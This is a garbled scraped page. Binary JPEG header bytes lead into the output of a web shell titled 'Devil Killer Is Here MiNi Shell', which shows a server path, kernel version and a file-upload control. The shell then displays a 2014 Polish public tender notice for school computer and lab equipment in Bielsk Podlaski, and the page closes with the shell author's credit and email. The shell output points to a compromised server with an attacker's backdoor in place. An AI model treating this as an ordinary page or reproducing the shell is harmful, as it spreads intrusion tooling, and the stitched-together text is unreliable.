JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140819/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140819/274406-N-2014.html

<p class="kh_header"><b>Bielsk Podlaski: Dostawa i montaż sprzętu komputerowego, multimedialnego, wyposażenia pracowni komputerowej, drukarki, pomocy dydaktycznych i oprogramowania   dla Zespołu Szkół w Augustowie w ramach  realizacji projektu Wiejska szkoła=Nowoczesna szkoła- nr projektu WND-POKL.09.01.02-20-948/13.</b><br>
<b>Numer ogłoszenia: 274406 - 2014; data zamieszczenia: 19.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół w Augustowie , Augustowo 30, 17-100 Bielsk Podlaski, woj. podlaskie, tel. 0-85 731 10 97, faks 0-85 731 10 97.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zsaug.manifo.com</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zespół Szkół w Augustowie.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż sprzętu komputerowego, multimedialnego, wyposażenia pracowni komputerowej, drukarki, pomocy dydaktycznych i oprogramowania   dla Zespołu Szkół w Augustowie w ramach  realizacji projektu Wiejska szkoła=Nowoczesna szkoła- nr projektu WND-POKL.09.01.02-20-948/13..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest Dostawa i montaż sprzętu komputerowego, multimedialnego, wyposażenia pracowni komputerowej, drukarki, pomocy dydaktycznych i oprogramowania  dla Zespołu Szkół w Augustowie w ramach  realizacji projektu Wiejska szkoła = Nowoczesna szkoła - nr projektu WND-POKL.09.01.02-20-948/13.
  
2.Zamówienie  dokonywane będzie  w podziale na części:

 I CZĘŚĆ ZAMÓWIENIA obejmuje dostawę sprzętu komputerowego i multimedialnego wraz  z oprogramowaniem oraz montażem. Szczegółowy opis przedmiotu zamówienia zawierający  parametry techniczne sprzętu objętego zamówieniem w części I oraz niezbędnego oprogramowania zawiera załącznik nr 1  do SIWZ .
Szczegółowe wymagania do montażu tablicy interaktywnej:
- Wszelkiego rodzaju przewody należy poprowadzić w listwach instalacyjnych.
- Miejsce instalacji wskaże Zamawiający.
- Po zakończeniu montażu i instalacji wykonawca przeprowadzi prezentację gotowości tablicy do pracy.
- Wykonawca dostarczy wszelkie niezbędne okablowanie. 

Ponadto Wykonawca zapewni szkolenia z obsługi tablicy dla minimum 2 pracowników wskazanych przez dyrektora szkoły. Wykonawca przeprowadzi szkolenie w czasie godzin pracy szkoły, przed terminem podpisania protokołu końcowego. Szkolenie musi trwać co najmniej 2 godziny zegarowe i winno być przeprowadzone na zainstalowanym sprzęcie w szkole. 

 II CZĘŚĆ ZAMÓWIENIA obejmuje dostawę  i montaż wyposażenia pracowni komputerowej 22 +1 stanowiskowa w sprzęt elektroniczny.
Szczegółowy opis przedmiotu zamówienia dla części II zawarty został w załączniku nr 2  do SIWZ.
Wykonawca zobowiązany jest do instalacji, integracji, uruchomienia oraz szkolenia użytkowników w ramach ceny za dostawę.
Szczegółowe wymagania:
- Wszelkiego rodzaju przewody należy poprowadzić w listwach instalacyjnych.
- Miejsce instalacji wskaże Zamawiający.
- Po zakończeniu montażu i instalacji wykonawca przeprowadzi prezentację gotowości tablicy do pracy.
- Wykonawca dostarczy wszelkie niezbędne okablowanie 
Ponadto Wykonawca zapewni szkolenia warsztatowe z obsługi pracowni komputerowej.
Szkoleniem należy objąć co najmniej 2 pracowników wskazanych przez dyrektora szkoły. Wykonawca przeprowadzi szkolenie w czasie godzin pracy szkoły, przed terminem podpisania protokołu końcowego. Szkolenie musi trwać co najmniej 4 godziny zegarowe i winno być przeprowadzone na zainstalowanym sprzęcie w szkole. 

 III CZĘŚĆ ZAMÓWIENIA obejmuje dostawę kolorowej drukarki laserowej. Szczegółowy opis przedmiotu zamówienia dla części III zawiera załącznik nr 3 do SIWZ 
Po zamontowaniu i uruchomieniu drukarki, wykonawca zapewni szkolenie instruktażowe  z obsługi tej drukarki, wskazanym przez Zamawiającego min. 2 pracownikom. Wykonawca udzieli minimum 24-miesięcznej gwarancji na kserokopiarkę będącą przedmiotem zamówienia, obejmującej serwis gwarancyjny, który obejmuje: 
a) przeglądy gwarancyjne zgodnie z zaleceniami producenta, w tym wymianę części eksploatacyjnych, 
b) wszystkie wykryte podczas eksploatacji sprzętu i oprogramowania usterki i wady oraz uszkodzenia powstałe w czasie poprawnego, zgodnego z instrukcją jego użytkowania.
c) wymianę części eksploatacyjnych poza przeglądami gwarancyjnymi, 
Pozostałe warunki gwarancji jak opisane poniżej w pkt 10, powstałe w czasie poprawnego, zgodnego z instrukcją jego użytkowania w okresie gwarancji -jeżeli tak stanowi gwarancja producencka.

IV CZĘŚĆ ZAMÓWIENIA obejmuje dostawę programu (8 licencji) do tworzenia grafiki komputerowej, dopuszcza się licencję zbiorową na 8 stanowisk, która będzie wykorzystywana w edukacji.
Szczegółowy opis przedmiotu zamówienia dla części IV zawiera załącznik nr 4 do SIWZ 

V CZĘŚĆ ZAMÓWIENIA obejmuje program online wspierający naukę matematyki w czwartej i szóstej klasie szkoły podstawowej - (dwa pakiety szkolne do 30 czerwca 2015 )
Szczegółowy opis przedmiotu zamówienia dla części V zawiera załącznik nr 5 do SIWZ. 

3.Zamawiający dopuszcza składanie ofert częściowych na jedną, kilka lub wszystkie części zamówienia. 
4.Miejscem dostaw dla każdej z części będzie siedziba Zamawiającego tj. Zespół Szkół w Augustowie, Augustowo 30, 17-100 Bielsk Podlaski.
5.Jeżeli opis zawarty w załącznikach od nr 1 do nr 5 SIWZ nie stanowi inaczej podane parametry/wymagania należy traktować jako minimalne. Wszelkie znaki towarowe, patenty lub wskazane pochodzenie, nazwy produktów oraz firm mają na celu wyłącznie wskazanie oczekiwanych przez Zamawiającego parametrów technicznych i jakościowych. Zamawiający dopuszcza składanie oferty równoważnej zgodnie z zasadami określonymi w art. 30 ust. 5 ustawy Prawo zamówień publicznych. W takim przypadku Wykonawca zobowiązany jest wykazać, iż oferowane przez niego dostawy spełniają wymagania określone przez Zamawiającego. Parametry techniczne i jakościowe zaoferowanego sprzętu nie mogą być gorsze niż parametry wskazane przez Zamawiającego. Do oferty równoważnej należy dołączyć deklaracje, certyfikaty, specyfikację techniczną oraz informacje o produkcie w formie opisu lub ulotki w języku polskim, zawierające wszystkie dane potwierdzające, że oferowany sprzęt  i oprogramowanie spełnia wszystkie  wymogi określone w SIWZ. W przypadku wątpliwości Zamawiającego, co do zaoferowanego przez Wykonawcę przedmiotu zamówienia na Wykonawcy ciążyć będzie obowiązek udokumentowania spełniania niniejszych warunków. 
6.Dostarczony sprzęt będący przedmiotem zamówienia w każdej z części, musi być fabrycznie nowy, nieużywany i wolny od obciążeń prawami osób trzecich. Sprzęt komputerowy, wyposażenie (panel i jednostka centralna) pracowni językowej,  tablica interaktywna,  projektor muszą spełniać następujące wymagania:
1)	posiadać deklaracje zgodności CE,
2)	posiadać certyfikat ISO 9001 dla producenta sprzętu
3)	komputery przenośne muszą spełniać wymogi normy Energy Star 5.0. posiadać  dołączone niezbędne  instrukcje  i materiały  dotyczące  użytkowania  w języku polskim  lub przetłumaczone z oryginału w innym języku, na język polski
7.W przypadku, gdy w urządzeniach komputerowych będących przedmiotem dostawy zainstalowano oprogramowanie, należy do każdego z tych urządzeń dostarczyć oddzielny nośnik z oprogramowaniem oraz  stosowny  certyfikat/licencję.
8.Wykonawca ponosi odpowiedzialność, za jakość wykonanych dostaw oraz zastosowanych podzespołów. 
9.Wykonawca udzieli gwarancji jakości na dostarczony i zamontowany sprzęt będący przedmiotem zamówienia zgodnie  z załącznikami do opisu przedmiotu zamówienia.
10.Ogólne warunki gwarancji : 
1) Wykonawca zapewni bezpłatny serwis gwarancyjny w okresie gwarancji. 
2) Wykonawca zapewni serwis gwarancyjny w miejscu użytkowania. 
3) Czas reakcji serwisu (rozumiany jako obecność serwisu u Zamawiającego po zgłoszeniu): do 48 godzin od poniedziałku do piątku (liczony od czasu powiadomienia Wykonawcy), 
4) Czas realizacji naprawy: do 10 dni roboczych (liczony od daty zgłoszenia do Wykonawcy). 
5) W przypadku konieczności oddania sprzętu do serwisu lub gdy naprawa sprzętu jest dłuższa niż 10 dni robocze Dostawca jest zobowiązany wypożyczyć sprzęt zapasowy (o parametrach, co najmniej równorzędnych) umożliwiający pracę w czasie naprawy gwarancyjnej. Sprzęt zapasowy powinien być dostarczony następnego dnia roboczego po dniu, w którym nastąpiło zgłoszenie. 
11.Wykonawca, może wykonywać niniejsze zamówienie przy udziale podwykonawców. W takim przypadku zobowiązany jest do wykazania w formularzu ofertowym części zamówienia, której wykonanie zamierza powierzyć podwykonawcom. Wykonawca odpowiada za działania i zaniechania ewentualnych podwykonawców jak za własne. 

12.Zamawiający nie przewiduje zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 7 ustawy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.21.31.00-6, 32.32.20.00-6, 38.65.21.00-1, 48.70.00.00-5, 30.12.14.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz ofertowy  wg załącznika Nr 6 do SIWZ
2.	Wykaz dokumentów jakie wykonawca winien  przedłożyć, potwierdzających, że oferowane dostawy  odpowiadają wymaganiom Zamawiającego:
- dla wszystkich oferowanych urządzeń:
1) specyfikacje techniczne oferowanych urządzeń komputerowych i multimedialnych   
2) deklarację zgodności CE,
3) dokument potwierdzający, że sprzęt jest produkowany zgodnie z normami ISO 9001,
- ponadto dla   komputera przenośnego:
1) deklaracje producenta sprzętu o zgodności oferowanego komputera z wymaganiami normy Energy Star 5.0.  oraz  wynik testu PassMark CPU Mark w postaci wydruku z programu  potwierdzający spełnienie wymagań   określonych w SIWZ dla procesora, 
3.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia:
1)	każdy wykonawca zobowiązany jest złożyć oddzielnie dokument określony w rozdziale X pkt 2 ppkt 2  i pkt. 3 ppkt.1 SIWZ,
2)	oświadczenie o spełnieniu warunków udziału w postępowaniu określone w rozdziale X pkt 1 ppkt 1SIWZ oraz oświadczenie o nie podleganiu wykluczeniu z postępowania określone w rozdziale X pkt 2 ppkt 1) SIWZ składa pełnomocnik wykonawców wspólnie ubiegających się                       o udzielenie zamówienia w ich imieniu bądź każdy z wykonawców oddzielnie.
4. Zgodnie z art. 26 ust 2b) i 2c) ustawy Pzp, wykonawca może polegać na wiedzy   i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia  lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia  (przedstawione w formie oryginału lub notarialnie poświadczonej kopii) do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.  Zobowiązanie do udostępnienia zasobów w trybie art. 26 ust. 2b ustawy Pzp winno być sporządzone zgodnie z zasadami reprezentacji podmiotu, który takie zobowiązanie podejmuje.  
5. pełnomocnictwo - w przypadku, gdy oferta została podpisana przez pełnomocnika lub gdy oferta została złożona przez Wykonawców wspólnie ubiegających się o zamówienie zgodnie  z art. 23 ustawy;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień Umowy, wynikających z przyczyn o obiektywnym charakterze (oczywista pomyłka w treści umowy, nieaktualne przepisy prawne itp.), a także w przypadkach:  
1)	zmiany terminu wykonania przedmiotu umowy, jeżeli dochowanie terminu określonego  w umowie jest niemożliwe z uwagi na siłę wyższą lub inne okoliczności niezależne od stron, lub których strony przy zachowaniu należytej staranności nie były w stanie uniknąć lub przewidzieć. Za siłę wyższą uważa się zdarzenia zewnętrzne, których  skutków nie da się przewidzieć ani im zapobiec;
2)	zmiany wynagrodzenia ryczałtowego brutto w przypadku zmiany obowiązującej wysokości  stawki podatku VAT, wyłącznie w wysokości wynikającej z tej zmiany 
3)	przedmiotu umowy - w sytuacji, gdy w czasie trwania umowy produkcja urządzeń objętych umową zostanie zakończona lub ograniczona, po zaproponowaniu przez Wykonawcę urządzeń o parametrach jakościowych nie gorszych od parametrów urządzeń stanowiących przedmiot Umowy.  
4)	zmiany unormowań prawnych powszechnie obowiązujących, które będą miały wpływ na realizację umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zsaug.manifo.com<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół w Augustowie, Augustowo 30, 17-100 Bielsk Podlaski.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.08.2014 godzina 15:00, miejsce: Zespół Szkół w Augustowie, Augustowo 30, 17-100 Bielsk Podlaski (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany przez Unie Europejską ze środków Europejskiego Funduszu Społecznego i budżetu państwa w ramach Programu Operacyjnego Kapitał Ludzki...</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com